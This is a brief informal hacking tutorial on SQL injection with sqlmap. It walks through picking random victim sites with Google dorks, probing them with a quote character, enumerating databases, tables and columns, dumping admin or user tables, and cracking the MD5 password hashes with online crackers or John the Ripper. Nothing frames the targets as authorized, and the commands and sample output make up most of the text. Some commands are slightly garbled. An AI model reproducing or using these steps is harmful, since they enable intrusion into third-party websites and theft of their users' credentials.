SQL Injection using SQLMAP

1. still use Google dorks for finding the targets

http://pastebin.com/86tBDdxv

2. use Google dorks like this,

ex,

inurl:prod_detail.php?id=

you can combine like this for looking specific domain,

inurl:prod_detail.php?id= site:.mn

3. pick your target

4. use ' char at the end of the link

ex,

http://yourtarget.comread.php?id=359237'  <--- see this ' char? put it at the end of the URL

5. run sqlmap,

http://yourtarget.com/read.php?id=359237 --dbs

6. wait until you find the database name

ex,

23:15:26] [INFO] falling back to current database

[23:15:26] [INFO] fetching current database

available databases [1]:

[*] ctrekker   <----- DB name

7. find the database tables,

sqlmap -u http://yourtarget.com/read.php?id=359237 -D ctrekker --tables

8. find some interesting tables, usually 'admin', 'administrator' or 'users'. it can be anything

9. find columns from that interesting tables

ex,

sqlmap -u http://yourtarget.com/read.php?id=359237 -D ctrekker -T tablesname --columns

10. dump the columns

ex,

sqlmap -u http://yourtarget.com/read.php?id=359237 -D ctrekker -T tablesname -C columnname --dump

11. party!!! you can crack some MD5 password using password crackers tools or from website

ex,

http://www.onlinehashcrack.com/

john the ripper